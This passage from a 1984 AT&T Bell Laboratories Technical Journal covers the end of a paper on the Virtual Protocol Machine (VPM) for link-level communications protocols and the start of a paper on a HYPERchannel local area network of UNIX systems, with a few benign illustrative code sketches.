The implementation of VPM on DEC computers (VAX-11, PDP-11) uses a programmable communications device known as a KMC11-B. The KMC11-B is a small (12K bytes), fast (200-ns instruction time), single-board computer that attaches to the UNIBUS* of a VAX* or PDP* computer. The KMC11-B can become bus master to perform DMA transfers to and from the host computer's main memory. The KMC11-B can be fitted with any of several types of communications interfaces. One type interfaces a single synchronous line at speeds of up to 56 kb/s. Another type interfaces up to eight synchronous lines at speeds up to 19.2 kb/s. The actual speed at which the interfaces can be used depends on the protocol. Because of the small memory size of the KMC11-B, the VPM compiler for the DEC computers translates a protocol script into an intermediate language that is interpreted by a control program in the KMC11-B. This intermediate language consists of binary instructions for a hypothetical computer with a simple one-address instruction set. The VPM primitives are implemented as single instructions for this virtual machine.
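A one-address instruction set of the kind just described can be illustrated with a toy interpreter. The opcodes below are invented for illustration (the actual KMC11-B intermediate language is not documented here); what is faithful to the text is the shape: each instruction names one opcode and one address, an implicit accumulator holds intermediate results, and the only data type is unsigned characters.

```cpp
#include <vector>
#include <cstddef>
#include <cassert>

// Toy one-address virtual machine: opcode + single memory address,
// with an implicit accumulator. Opcodes are hypothetical.
enum op { LOAD, ADD, STORE, HALT };

struct insn {
    op  code;
    int addr;
};

void run(const std::vector<insn>& prog, std::vector<unsigned char>& mem)
{
    unsigned char acc = 0;                       // the single accumulator
    for (std::size_t pc = 0; pc < prog.size(); pc++) {
        const insn& in = prog[pc];
        switch (in.code) {
        case LOAD:  acc = mem[in.addr];                          break;
        case ADD:   acc = (unsigned char)(acc + mem[in.addr]);   break;
        case STORE: mem[in.addr] = acc;                          break;
        case HALT:  return;
        }
    }
}
```

In the real system, each VPM primitive compiles to a single such instruction, and the control program plays the role of run().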
The VPM compiler for the DEC machines does not support the full C language. While essentially all of the control structures and operators of C are admitted, there is only one data type: unsigned characters. All variables are global. Besides interpreting the compiled protocol script, the VPM control program is responsible for: (1) communicating with the host computer (via eight bytes of shared memory) in order to receive commands from the host and send reports to the host, (2) servicing the synchronous line interface(s), (3) monitoring modem status, (4) maintaining a series of software timers, and (5) maintaining queues of transmit buffers and receive buffers.

The VPM control program for the eight-line interface uses an efficient real-time scheduling algorithm to meet the needs of communications processing: once the virtual process for a given line gets control of the processor, that process is allowed to run until it blocks. A process can block voluntarily by executing a pause primitive. Once a process blocks, it is not rescheduled until the occurrence of some event that could change the state of the protocol for that line. Such events are:

1. Arrival of an incoming character or completion of an outgoing character for a character-oriented protocol; completion of an incoming or outgoing frame for a bit-oriented protocol.

2. Notification by the host of the availability of a transmit buffer or a receive buffer, or a command from the host.

3. Expiration of a timer previously started by the process.

As processes become unblocked, they are placed on the end of a ready-to-run queue and scheduled in a First-In First-Out (FIFO) manner.

* Trademark of Digital Equipment Corporation.
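The run-until-block, FIFO ready-queue discipline just described can be sketched in a few lines. The line numbers here stand in for per-line protocol processes; the class and its names are illustrative, not the control program's actual interfaces.

```cpp
#include <deque>
#include <cassert>

// Sketch of the eight-line control program's scheduling discipline:
// an unblocked process goes on the end of a ready-to-run queue and
// the head of the queue runs until it blocks again.
class scheduler {
    std::deque<int> ready;        // line numbers of unblocked processes
public:
    // An event (character, frame, host buffer, timer) unblocked a line.
    void unblock(int line) { ready.push_back(line); }

    // Pick the next line to run, FIFO; -1 means every line is blocked.
    int next() {
        if (ready.empty())
            return -1;
        int line = ready.front();
        ready.pop_front();
        return line;              // runs until pause() or blocking
    }
};
```

Because a process keeps the CPU until it blocks, there is no preemption to reason about inside a protocol script, which keeps the per-line state machines simple.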
Because of the limited memory space in the KMC11-B, the implementation for the eight-line interface requires that all eight lines share a single copy of the compiled protocol script; this implies that all eight lines must be running the same level-2 protocol. Each line has a 256-byte data area that is used to hold the local variables for that line and as a save area on a context switch. Memory protection is provided by the interpreter.

5.2 AT&T 3B20 computer

The 3B20 is a 32-bit general-purpose minicomputer manufactured by AT&T. It supports three different PCDs. One PCD supports character-oriented protocols using the VPM primitives; the other two PCDs support X.25 LAPB and are not user-programmable but are controlled by CSI. The remainder of this section describes the character-oriented PCD.

The 3B20 implementation of VPM differs from that on the DEC machines. Protocol programs are not interpreted, but are compiled into machine language and executed directly. The PCD consists of a microcomputer system with four RS-232/449 ports. One of the ports also supports a CCITT V.35 interface for communication at speeds up to 56K bits per second. The major software components are a full C language compilation system, a library of VPM primitives, a small operating system to oversee execution of protocol programs, and a UNIX system driver to interface to CSI.

A C compiler-based VPM implementation was chosen because C language support existed for the hardware before VPM was implemented, and the PCD has ample memory. Supporting the full C language allows protocol programs to be as sophisticated as the application requires and real-time constraints permit.

Protocol programs run under the control of a small VPM operating system. It supports five independent processes: four protocol programs and one control program. All processes and the operating system reside in the same address space.
The memory and address space not used by the system is partitioned statically into four pieces, one partition for each port. There is no hardware memory protection, and processes are expected to be cooperative.

VPM primitives such as rcv and xmt are implemented using a lower-level set of primitives that are defined by the operating system. The intent was to provide a system that could be extended beyond VPM if desired. These subprimitives provide facilities for scheduling, transferring messages to and from the driver, doing DMA to the host memory, copying data, and accessing peripheral device registers.

Processes are scheduled in a round-robin fashion using a one-tenth of a second time slice. A process will run until it either gives up the CPU or is preempted after running for one-tenth of a second. A process is always runnable unless it has been stopped or exited. The pause primitive gives up the CPU until all the other processes have had a chance to run. Rcv is implemented as:

	while (receive queue is empty) {
		check modem status
		pause();
	}
	return next character from the queue

Characters are placed into the receive queue by the operating system through interrupts. The xmt primitive is similar. It puts characters into a queue, and the characters are actually transmitted at interrupt level.

The VPM operating system is brought into service by downloading it through a standard "device on-line" command. After being downloaded, the control process runs and waits for work to do. The control process has three functions: (1) download, stop, and start protocol programs; (2) respond to audits or "sanity checks" from the driver; and (3) respond to "set Universal Synchronous/Asynchronous Receiver/Transmitter (USART) options" commands from the driver.

A protocol program is created in two steps. First, the C source is compiled and linked with the VPM primitive library, with loader relocation information left intact.
The output of this step is a generic object program that can be run on any port of any PCD. The next step is to relocate the program to the memory partition that is appropriate for the particular port being used, and then download it into the PCD.

5.3 AT&T 3B5 computer

The AT&T 3B5 is also a 32-bit general-purpose minicomputer. It is somewhat smaller than its predecessor, the 3B20, but it is software compatible with it. VPM forms the software structure used to support most data-linking capabilities on the 3B5.

The 3B5 VPM implementation is based on that for the 3B20, with C programs compiled into machine language and executed directly. In fact, the CSI, trace driver, protocol scripts, transparent driver, and many utility programs were simply ported from the 3B20 and recompiled. Because the PCD hardware is much different, the VPM operating system was redesigned, but it maintains the same interfaces as that on the 3B20. Thus, protocols that run on the 3B20 will, in general, run on the 3B5 with just a recompilation.

The PCD hardware consists of an intelligent peripheral controller, which runs the scripts, plus a collection of boards containing line interfaces for the various protocol classes. Several of these boards may be serviced simultaneously by the controller, with many different protocols running simultaneously.

The major software components have already been described in connection with the 3B20. On the 3B5, however, memory availability is the only limit on the number of processes supported by the VPM operating system, and a limited degree of protection between protocol programs exists. Memory allocation is dynamic, done when the scripts are loaded into the peripheral controller or by request of the running script via a primitive. Multiple instances of the same protocol may share the same copy of their program, using separate stacks and data areas.
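Since 3B20 protocols run on the 3B5 after recompilation, the rcv loop shown in Section 5.2 applies here as well. A compilable sketch, with the receive queue and pause() as stand-ins for the VPM operating system's internals (the real queue is filled at interrupt level):

```cpp
#include <deque>
#include <cassert>

// Sketch of the rcv primitive: spin on the receive queue, yielding
// the CPU via pause() until the interrupt side has queued a character.
static std::deque<unsigned char> rcvq;   // filled "at interrupt level"
static int pauses = 0;                   // counts voluntary yields

static void pause_prim()
{
    // In the real system this gives up the CPU until the other
    // processes have had a chance to run; here it just counts.
    ++pauses;
}

unsigned char rcv()
{
    while (rcvq.empty()) {
        /* check modem status would go here */
        pause_prim();
    }
    unsigned char c = rcvq.front();
    rcvq.pop_front();
    return c;
}
```

The xmt side is symmetric: the primitive queues a character and the interrupt handler drains the queue onto the line.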
The controller operating system and the primitives reside in Erasable Programmable Read-Only Memory (EPROM), but much of the code may be selectively replaced by downloading new versions when the system is initialized. Scheduling, event handling, and the rest of the program creation and download process are as described for the 3B20. In addition to the standard trace facility, routines exist that allow a script to output directly to an optional debugging port on the PCD rather than back to the host.

While VPM was originally intended to support only synchronous interfaces, on the 3B5 computer it has been extended to include asynchronous communication as well. This involved, besides providing the necessary hardware, the addition of the small collection of asynchronous primitives that were outlined in a previous section. These primitives are used to support a standard UNIX system terminal interface using either RS-232C or Teletype Standard Serial Interface.

VI. APPLICATIONS

VPM has been used by UNIX system developers and customers to implement a variety of protocols supporting various networking applications. Some of the more widely used protocols and applications have been developed for official UNIX system distribution; these are briefly described below. Many other protocols and applications have been developed by our customers; some of these are listed in the miscellaneous section below.

6.1 Remote job entry

The Remote Job Entry (RJE) system connects UNIX systems to IBM 360/370 computers by simulating a remote work station. The basic facility provided by RJE is the remote execution of jobs created on the UNIX system. The IBM and UNIX systems communicate using a character-oriented protocol known as Houston Automatic Spooling Priority (HASP) multileaving. Three processes are used to implement the multileaving protocol: a PCD program and two user processes. The protocol program implements level 2.
It performs header consistency and CRC-16 checks on received blocks, and it generates the CRC-16 data for transmitted blocks. It also performs Extended Binary-Coded Decimal Interchange Code (EBCDIC) to American National Standard Code for Information Interchange (ASCII) translation on print data. The two user processes multiplex and demultiplex multiple job streams to and from a single data link.

6.2 Synchronous terminals

Two applications of VPM support IBM 3277-compatible display station (terminal) clusters. The Synchronous Terminal (ST) system allows terminal clusters to be connected to a UNIX system host, while the 3270 Emulation (EM) system allows applications to connect to hosts that support terminal clusters. Both of these packages have been implemented using VPM and CSI.

Synchronous terminals communicate with the host through a single cluster controller using the BISYNC line protocol. Message traffic is regulated by using a polling and selecting scheme. The host polls the cluster for available input data and selects specific terminals for output.

The ST system software consists of a level-2 protocol script and a level-3 driver. The script implements the polling and selecting functions of the line protocol. The driver provides two different user interfaces: (1) In application mode, the controlling user process completely manages the display terminal screen. (2) In line mode, the driver provides enough basic screen management to make the device usable as a login terminal for most of the standard UNIX system commands.

The EM system software consists of a level-2 protocol script and a level-3 driver interface. The script implements the BISYNC line protocol of a display station controller. The driver interface is in two parts: a controller interface driver that handles link administration and controller functions, and a terminal interface driver that supplies the user-level interface.
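The CRC-16 mentioned for the multileaving link (Section 6.1) can be sketched as follows. Whether the RJE script used exactly these conventions is an assumption; the sketch uses the common "CRC-16" of the era: polynomial x^16 + x^15 + x^2 + 1 (0x8005), processed bit-reflected with a zero initial value.

```cpp
#include <cstdint>
#include <cstddef>
#include <cassert>

// Bitwise CRC-16 (ARC variant): reflected polynomial 0x8005 -> 0xA001,
// initial value 0. The sender appends the result to each block; the
// receiver recomputes it to detect transmission errors.
uint16_t crc16(const unsigned char* buf, size_t len)
{
    uint16_t crc = 0;
    for (size_t i = 0; i < len; i++) {
        crc ^= buf[i];                        // fold in next data byte
        for (int bit = 0; bit < 8; bit++) {
            if (crc & 1)
                crc = (crc >> 1) ^ 0xA001;    // shift out a 1: apply poly
            else
                crc >>= 1;                    // shift out a 0
        }
    }
    return crc;
}
```

In production code a 256-entry lookup table replaces the inner bit loop, but the bitwise form makes the polynomial arithmetic visible.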
6.3 X.25 interface

X.25 is an international standard layered data communications protocol that allows several virtual channels to be multiplexed over a single physical link. Each channel has its own flow control and error control. The current version of X.25 in the UNIX system consists of three levels. On DEC computers, level 2 is implemented as a VPM protocol script. On AT&T computers, level 2 is implemented on PCDs that do not support VPM. Level 3 of X.25 is implemented using CSI, which makes it portable across all UNIX system hosts that support CSI.

6.4 5620 DMD support

The Teletype 5620 Dot Mapped Display (DMD) terminal is an intelligent peripheral containing a keyboard and display, an electronic "mouse" for cursor pointing, and an RS-232 output port for a dot matrix printer. The driver that supports it utilizes VPM. Through application code, options in the VPM-based driver, and software running on the DMD, multiple windows are supported on the terminal display. This driver is based on the asynchronous terminal package with the addition of multiple communications channels and knowledge of the communications protocol used by the code running on the DMD. This involves dynamically replacing the line discipline used in standard terminal mode with one that multiplexes and demultiplexes packets intended for a virtual terminal, and ensuring that all packets are properly ordered. Flow control is provided to ensure that packets are not sent more quickly than they can be received.

6.5 Miscellaneous

Some customer-developed applications of VPM include:

• LEAP — A package similar to the 3270 emulation package that is used to load-test IBM host applications that use 3270-compatible terminals.

• Bell Administrative Network Communications Systems (BANCS) — A message-switching network for business communications. The internal protocols are based on BISYNC. A UNIX system interface to control the BANCS switches has been developed using VPM.
• BLN — An AT&T Bell Laboratories Network that connects hosts from different vendors typically running different operating systems. An interface to BLN for UNIX system hosts was developed using VPM.
• WANG — A protocol script was developed to allow UNIX systems to interface to a WANG word processor.

VII. CONCLUSION

VPM was developed in response to a need to implement several different character-oriented protocols on DEC’s KMC11-B microprocessor. We did not have the resources or the inclination to develop and support assembly-language implementations of these protocols plus an unpredictable number of future requirements. We therefore were led to develop a general-purpose package for implementing level-2 protocols rather than several different assembly-language implementations of specific protocols. As this effort unfolded, new requirements led us to expand VPM to include bit-stuffing protocols as well. When the UNIX system was ported to new computers with different PCDs, VPM became the means of porting level-2 protocol implementations to the different PCDs involved.

Since VPM allowed the representation of a level-2 protocol to be hardware independent, it could be ported to other environments with little or no change. In a few cases, protocol implementations that were developed using VPM have been ported to environments unrelated to the UNIX system.

As VPM was extended to new UNIX system hosts, and higher-level protocols such as X.25 were implemented as UNIX system drivers, it became necessary to provide a means that would ensure the portability of these drivers. This led to the definition of the Common Synchronous Interface (CSI), which provides a device-independent interface between level-2 and level-3 protocols.

The clear success of VPM as a UNIX system facility is gratifying to all of us who had a part in developing it.
The goal of opening up data communications programming to applications programmers has been met; customers really are writing their own communications applications. The ability to program link-level protocols in a high-level language has been valuable in debugging implementations of complex protocols such as X.25. The ability to port protocol implementations between computers, although not considered in the original goals, has become perhaps the most important feature.

VIII. ACKNOWLEDGMENTS

In addition to the authors of this article, a large number of people have contributed directly or indirectly to the development of VPM; among them are R. V. Baron, C. A. Bishop, R. J. Butera, T. A. Dolotta, J. A. Dziadosz, R. M. Ermann, R. C. Haight, C. B. Hergenhan, D. E. Jimenez-Puttress, G. W. R. Luderer, G. J. McGrath, B. Nohejl, V. H. Rosenthal, R. M. Sabrio, A. L. Sabsevitz, L. J. Schroeder, D. R. Shuman, B. A. Tague, B. E. Todd, and L. A. Wehr. Finally, the utility of the UNIX system architecture, philosophy, and tools as a basis for the development of VPM is gratefully acknowledged.

AUTHORS

Michael J. Fitton, B.S. (Computer Science), 1981, Rutgers University; M.S. (Computer Science), 1983, Stevens Institute of Technology; AT&T Bell Laboratories, 1977—. Mr. Fitton has been involved in software development for the UNIX operating system. His initial work involved the design and implementation of tools for the Programmer’s Workbench version of the UNIX system. He has also worked on data communications software and operating system development.
He is currently working on the development of a multiprocessor version of the UNIX operating system.

Carol J. Harkness, B.A. (Mathematics), 1969, University of Wisconsin; M.S. (Computer Science), 1970, Purdue University; AT&T Bell Laboratories, 1969—. Ms. Harkness has designed editors, compilers, assemblers, and test tools for a variety of ESS™ projects. She became involved with microprocessors through debugging tool development, then went on to developing peripheral software and firmware for the AT&T 3B5 computer. She is currently the Supervisor of the Network Design group, developing the AT&T 3B Net local area network for the 3B computer line. Member, ACM, IEEE, Phi Beta Kappa, Phi Kappa Phi, Sigma Epsilon Sigma.

Keith A. Kelleman, B.S. (Electrical Engineering), 1979, Lafayette College; M.S. (Computer Science), 1981, Stevens Institute of Technology; AT&T Bell Laboratories, 1979—. At AT&T Bell Laboratories, Mr. Kelleman has been involved with UNIX operating system development. He is currently working on the development of a demand-paged kernel for the UNIX system. His previous assignments were to develop a UNIX system for the AT&T 3B20 computer and to convert the RJE system to VPM.

Paul F. Long, B.S. (Engineering Mathematics), 1960, M.S. (Applied Mathematics), 1963, North Carolina State University; Bellcomm, Inc., 1965-1972; AT&T Bell Laboratories, 1972—. Mr. Long has worked on various applications and systems programming projects and supervised similar activities over the last 18 years. In addition to working on VPM, he participated in the UNIX operating system BX.25 implementation as well as other UNIX system networking projects. Member, Tau Beta Pi, Pi Mu Epsilon, Sigma Xi.

Carl Mee III, B.S. (Mathematics), 1957, The University of the South; M.A. (Mathematics), 1964, The University of Virginia; U.S. Air Force, 1958-1962; Bellcomm, Inc., 1964-1966, 1968-1972; Informatics, Inc., 1966-1968; AT&T Bell Laboratories, 1972—.
Mr. Mee has worked on a variety of applications and systems programming projects. From 1978 to 1983 he worked on the development of communications facilities and other software for the UNIX operating system. He is currently working on the development of video-based interactive information systems.

AT&T Bell Laboratories Technical Journal Vol. 63, No. 8, October 1984 Printed in U.S.A.

The UNIX System: A Network of Computers Running the UNIX System

By T. E. FRITZ,* J. E. HEFNER,* and T. M. RALEIGH†

(Manuscript received September 1, 1983)

This paper discusses experience in designing software to interconnect large numbers of processors that are based on the UNIX™ operating system over a high-speed local area network. The paper discusses portability of the implementation between different processors and operating systems based on the UNIX system, and the influence of different schedulers, input/output subsystems, and different-speed processors on the implementation and performance of the network. Also discussed are characteristics of network usage, such as traffic patterns, throughput, and response.

I. INTRODUCTION

This paper documents experience in designing software to interconnect large numbers of UNIX operating systems at AT&T Bell Laboratories over a high-speed local area network. The networks are used to support large cooperative development environments and general-purpose computer centers.

II. BACKGROUND

By 1979, the needs of many development projects and computing center environments at AT&T Bell Laboratories had outgrown the confines of a single minicomputer or mainframe. The programming environment provided by the UNIX system had become the preferred development environment on both small and large software development projects. The preference for a UNIX system environment was so strong that many development functions were migrated from traditional mainframes to minicomputers running the UNIX system. As the size and complexity of each project increased, additional minicomputers were added to balance the load among users, thereby creating a need for communication between systems. For several years, the dial-up network provided by uucp 1 satisfied the communication needs of many widely separated small development environments; but for large cooperative development environments, the network was overloaded and the need for higher-speed localized access between processors was apparent. During the same period, implementations of the UNIX system on other processors (IBM 370, AT&T 3B20S, and UNIVAC*) were in progress, and it was clear that users wanted to view processors as different-speed functional engines (minicomputer versus mainframe), all with a standard UNIX operating environment and with a common high-speed interconnect. During 1979, a standard UNIX system interface was far from realized, since many of the UNIX system implementations were in their infancy and the lessons about portability of software were being uncovered painfully.

Research and development of network software for UNIX systems have been emphasized since the UNIX system was first introduced in 1973.

* AT&T Bell Laboratories.
† AT&T Bell Laboratories; present affiliation Bell Communications Research, Inc.

Copyright © 1984 AT&T. Photo reproduction for noncommercial use is permitted without payment of royalty provided that each reproduction is done without alteration and that the Journal reference and copyright notice are included on the first page. The title and abstract, but no other portions, of this paper may be copied or distributed royalty free by computer-based and other information-service systems without further permission. Permission to reproduce or republish any other portion of this paper must be obtained from the Editor.
The uucp network is familiar to all UNIX system installations, and many implementations of small networks using X.25, DDCMP,† time-division multiplexors, and other media have been developed to provide limited batch file transfer capabilities. In parallel with this, much research has gone into interactive networks 2 of UNIX systems. Most of this work was characterized as follows:
1. All processors were identical (single vendor).
2. There was no standard UNIX system environment. The environment (operating system and C compiler) at each site was under the control of local researchers and developers and was frequently custom tailored.
3. Because of the availability of, and investment in, 16-bit minicomputers, the network software was constrained to run in a limited address space (in particular, the address space of a PDP-11/70:† 64K bytes of text and 64K bytes of data). This limitation existed for both the user-level network control programs and within the operating system. It placed constraints on the size and function of network support functions for the operating system. Keeping the implementation small and isolated from the kernel of the system was a goal of many of the implementations.

The availability of local area networking devices and the emergence of 32-bit minicomputers by 1980 offered the potential for creating a distributed computing environment for the UNIX system. It also provided the impetus for standardizing the operating system interfaces, commands, and compilers. A transition to a multiple-vendor computing environment was feasible because a standard package of software reduced the cost of developing and maintaining a standard environment on each vendor’s hardware.

* Trademark of Sperry Corporation.
† Trademark of Digital Equipment Corporation.
The development of the UNIX system local area network using the HYPERchannel* network is instructive because not only did the ordinary portability issues of user-level application software (word length, byte-order dependencies, etc.) have to be addressed, but several operating systems that resembled the UNIX system were hosts on the network; differences between these implementations affected other aspects of portability.

III. A HIGH-SPEED LOCAL AREA NETWORK

Development of the 5ESS™ switching system 3 had created the need for many cooperating minicomputers (3B20S, VAX,† and PDP-11/70 computers) and mainframes (IBM 370) to manage a large software development environment. This project provided the impetus for the development of both the HYPERchannel network and the UNIX system implementation for the IBM 370 processor. The selection of the HYPERchannel network as the interconnect medium was based on the large number of interfaces to processors that existed (IBM, DEC,† Data General, etc.) and the success of some prototyping work done at the Indian Hill computer center for the AT&T Bell Laboratories network. Ethernet,‡ Datakit™ virtual circuit switch, X.25, and broadband networks were not commercially available for a wide variety of processors. Constructing the software and shaking out the initial skeleton of the network spanned two and one-half years and involved many developers from several AT&T Bell Laboratories locations.

The HYPERchannel network was developed to serve a community in which:
1. The network had to support a range of UNIX system versions and C compilers.
2. The network was required to run on 16- and 32-bit processors with different byte orderings, word lengths, and processing power.
3. The implementation was required to run on other similar operating systems.

* Trademark of Network Systems Corporation.
† Trademark of Digital Equipment Corporation.
‡ Trademark of Xerox Corporation.
The input/output (I/O) subsystems for each vendor’s processor had a different architecture, and the control sequence for communicating with each network adapter was different. This meant that a major part of the development was designing and synchronizing device drivers and establishing the proper error recovery on each processor.
4. The reliability of the network had to remain high in spite of the fact that processors would randomly join and leave the network (deliberately or unexpectedly).

Because of the number of different environments that were involved, several design constraints were enforced on the software. In particular,
1. Since all processors would run in a user environment similar to the UNIX system, a goal was set to produce a single user-level network software package that would run on all implementations. Not all machine dependencies could be excluded from the user-level source, so conditional compilation of a few user modules was the only vehicle allowed to account for machine dependencies, and its use was discouraged.
2. The network software and drivers were written in a subset of the C language. Recent additions to the C language, such as enumeration data types and block structure, were not allowed because the compilers on each different processor had not reached the same level of maturity.
3. New operating system features were excluded from the design. Interprocess communication features (e.g., shared memory, messages, semaphores) could not be taken advantage of, since they were not yet implemented on some UNIX systems (e.g., the first version of the UNIX system for IBM System/370) or the implementation was not portable. For example, the architecture of the memory management hardware on PDP-11/70 and VAX-11/780* processors dictated a radically different interface and implementation for shared memory.
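The byte-order dependencies mentioned above are the classic portability trap on a mixed PDP-11/VAX/IBM 370 network. One machine-independent idiom — extracting a multibyte field from a network buffer by shifting, rather than by overlaying a structure on the buffer — avoids per-machine conditional compilation entirely. This is a general illustration of the technique, not code from the network package itself.

```c
/* Portable extraction of a 16-bit big-endian ("network order")
 * field.  The result is identical on little-endian and big-endian
 * hosts because only arithmetic, not memory layout, is involved. */
#include <assert.h>

unsigned int get16(const unsigned char *p)
{
    return (p[0] << 8) | p[1];
}
```

The alternative — `#ifdef` blocks keyed to each processor — is exactly the mechanism the project allowed only in "a few user modules" and discouraged.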
In spite of the differences in compilers and byte orders of processors, the software contains only a few conditional compilation statements that are processor dependent.

3.1 Operating system environment

The UNIX system environment that existed on the network was not uniform. Versions 3.0, 4.2, and 5.0 of the UNIX system (two of these systems are sold commercially as UNIX Systems III and V), or emulations of these systems, were all present on the network. Development projects usually require a gradual transition from one version of a system to another, so old versions of the operating system lingered on some processors for long periods of time. The following operating system implementations or emulations were part of the network.

3.1.1 The UNIX operating system

The initial prototype network software was done for the PDP-11/70 computers running UNIX System III. Since native-mode UNIX system implementations* are similar, porting the network software and drivers to the VAX-11/780 computer was straightforward, but making the implementation work on the VAX-11/780 consumed months of effort because of hardware interface problems. When the UNIX system implementation for the 3B20S computer was available, it was added to the network. This processor has a specialized I/O subsystem and required the design of a new device interface and a structurally different device driver. This development extended over a one-year period.

3.1.2 The UNIX system implementation for System/370

An implementation of the UNIX system on IBM 370 processors 4 became an integral part of many of the networks. This UNIX system implementation uses the IBM TSS operating system for the basic kernel, paging, and device management. The UNIX system implementation runs on top of the TSS operating system as a single supervisor managing all user processes as subtasks.

* Trademark of Digital Equipment Corporation.
Because of the structure of the implementation, the relationship of an ordinary user process to the kernel and device drivers is different from native-mode UNIX system implementations; designing the device driver required the creation of a special pseudo device driver that split responsibilities for managing the interface between TSS and the UNIX system supervisor.

3.1.3 The UNIX RT operating system

The UNIX Real-Time (RT) operating system is a message-based implementation of the UNIX system that runs only on PDP-11/70 computers and is of interest for historical reasons and because it is such a radically different emulation of the UNIX system interface. 5 The operating system is partitioned into modules that communicate by means of messages, and all device drivers are processes in the system. The I/O subsystem, file system, and basic processor scheduling were also radically different on this system. Since the UNIX RT system software runs only on PDP-11/70 processors, the hardware interface part of the driver was similar to the UNIX system driver; however, the message protocol that interfaces the driver to the kernel and the semaphores that synchronize the driver required a radically different design of the network control part of the driver. The Duplex Multiple Environment Real Time (DMERT) operating system 6 is a high-reliability derivative of the UNIX RT operating system software, and plans are under way to interface the AT&T 3B20D duplex processor to the network. Figure 1 is a representation of the process structure of each of the operating systems that are on the network.

* The term “native-mode UNIX system implementation” refers to implementations resulting from porting the UNIX system source to a processor. This is in contrast to an implementation that emulates the UNIX system interface on top of a different operating system (e.g., the UNIX system for System/370).
User-level processes are shown as circles labeled with the letter “u”, together with their relationship to the major modules of the operating system.

Fig. 1 — UNIX operating system implementations for (a) the standard UNIX system, (b) the UNIX system for IBM System/370, and (c) the UNIX RT operating system.

3.1.4 Schedulers

Even though the UNIX system implementations are similar, the basic scheduling of the CPU was different on each system, and the following dependencies were found.
1. The UNIX system attempts to share the processor among all processes on the system. 7 Since the network supports multiple conversations, the more conversations that exist in parallel, the greater the percentage of the CPU devoted to networking. Most customers view networking as an adjunct to their system and would prefer to limit networking (and other functions) to a fixed fraction of the CPU. This would require a fair share scheduler based on shares allocated to users rather than processes.
2. The UNIX system for System/370 relies on TSS to schedule jobs and handle interrupts. The TSS scheduler was tuned to run a time-sharing load; however, the tools for manipulating the priority of jobs are crude.
3. The UNIX RT system software gives a high priority to I/O-bound jobs. Initially, this gave the network software higher priority than desired, and scheduler changes were made to prevent the network from hogging the processor on several of the heavily used UNIX RT systems.
On all systems, the network runs at a slightly higher priority than that of average users to reduce the amount of time that packets linger in adapters.

3.1.5 I/O subsystems

The I/O subsystems for the different processors and operating systems are different. The device driver software for different operating system implementations is similar but is not portable.
The development and maintenance of different device drivers was the single most time-consuming aspect of the project.

IV. NETWORK ARCHITECTURE

The network consists of the HYPERchannel hardware that forms the physical connection between host processors and the host-resident software that implements a batch file transfer service. An overview of these two segments follows.

4.1 Network hardware architecture

The HYPERchannel network is a Carrier Sense Multiple Access (CSMA) network used to interconnect a variety of processors. A good description of the system can be found in Ref. 8. The following sections summarize the major components of the system from a conceptual point of view.

4.1.1 Cable

Coaxial cable connects adapters in this network. The cable is not continuous, and up to four parallel cables (trunks) can connect adapters. The cable is daisy-chained between adapters as in Fig. 2a. The cables linking adapters together are referred to as trunks. Each trunk is a totally separate communication pathway, so Fig. 2b is a better representation of the interconnection. (Data cannot jump between trunks unless a processor on the network reads the data from the adapter on one trunk and retransmits it on another trunk.) The trunk usage is managed solely by the adapters and is of no concern to the user.

Fig. 2 — (a) Daisy-chaining of adapters. (b) Conceptual interconnection of adapters.

4.1.2 Adapters

The adapters connect processors to the network and execute transfers between adapters. The design of all adapter models is fundamentally the same; each model has different microcode, depending on the type of processor connected to it. Figure 3 illustrates that a minicomputer adapter can have four different processors attached to the same adapter, while only one processor may be connected to a mainframe

Fig. 3 — Simple HYPERchannel local area network.
adapter. Figure 4 is a simplification of the internal structure of an adapter. Each adapter contains
1. A 4K-byte data buffer
2. A small buffer area for messages
3. A high-speed microprocessor
4. Circuits for transmitting and receiving data on trunks
5. Circuits for transmitting data to the processor.

4.1.2.1 Processor-to-processor transfers. A transfer is outlined below.
1. Requests to transmit data across the network are generated by a user and queued (see Fig. 5).
2. A request for service is initiated by processor 1 (Fig. 5, line a). To do this, processor 1 must first get the attention of its own adapter (Fig. 5, line b). This is a significant point because the adapter has only one data buffer. The adapter is a half-duplex device; that is, while the buffer is being used to transmit data, the adapter is busy and cannot receive data. Similarly, the adapter cannot transmit data if a data packet has arrived. This half-duplex nature of the microcode in the adapter gives an implied preference for received data and makes the device software for the adapter complicated.
3. Once the adapter has accepted the request to transfer from processor 1, it executes a reservation protocol to reserve the remote adapter and transmits the data (Fig. 5, line c).
4. At the remote adapter, an interrupt is generated to notify processor 2 that data have arrived (Fig. 5, line d). Processor 2 then unloads the adapter (by means of direct-memory access) and stores the received data. (An important parameter here is how long it takes processor 2 to schedule a user job to unload the adapter. The network software runs at a high priority, but since the UNIX system is a time-sharing system, the data could remain in the adapter for several seconds or minutes on a heavily loaded system. The length of time data sit in an adapter is important because no other data can be transmitted or received on that adapter until the data are unloaded.)

Fig. 4 — HYPERchannel adapter.
Fig. 5 — Processor-to-processor transfers.

4.1.2.2 Link adapters. Link adapters are a pair of adapters that allow two local area networks to be joined together and appear as one. Figure 6 shows link adapters connecting two networks. One link adapter is placed on each network. Several different types of transmission media are available for carrying data between the link adapters. Fiber optic lines and 56-kb/s private lines have been used successfully at various AT&T locations. The following should be noted:
1. When link adapters are used, the network appears as one large network.
2. The link adapters operate as half-duplex devices since there is only one buffer in each adapter. Low-speed transmission lines produce major bottlenecks within the network; therefore, high-speed media (fiber optics, T1, or microwave) should be used.

Fig. 6 — Interconnection of local area networks using link adapters.

4.2 Networking software architecture

The networking software is divided into three distinct layers:
1. A service layer that consists of user-level commands (nusend) to initiate the file transfer process; in addition, it contains commands (nscstat, nscloop) that query the state of the network.
2. A session layer that provides agreements between processors for file transfer and remote execution (nscd, nsclisten, nscrecv).
3. A link layer that provides for reliable transmission of data between systems (nscsend, nscread).
Each of these layers, as well as the interactions between layers, is discussed in the following sections. The structure of the architecture and the communication between layers are illustrated in Fig. 7.

Fig. 7 — Network processes and the protocol layers they implement.

4.2.1 Service layer

The user initiates a file transfer with the nusend command; this command queues the request by creating a Job Control Language (JCL) file on disk, which contains all information necessary to deliver the requested files to the destination system. The nusend command informs the session layer that new work has arrived by attempting to execute the file transfer daemon nscd.

4.2.2 Session layer

The session layer packetizes user data files and arranges for their transfer over the network. This file transfer protocol is implemented using three processes:
1. nscd — the file transfer daemon
2. nsclisten — a listener process that waits for incoming requests
3. nscrecv — the file receive daemon.
The session layer communicates with the link layer through UNIX system pipes and signals. It receives work from the service layer by reading the JCL files created by nusend, and it sends mail to the user on completion.

4.2.2.1 Nscd. Nscd reads the JCL files created by nusend to determine what work is to be performed. It is responsible for:
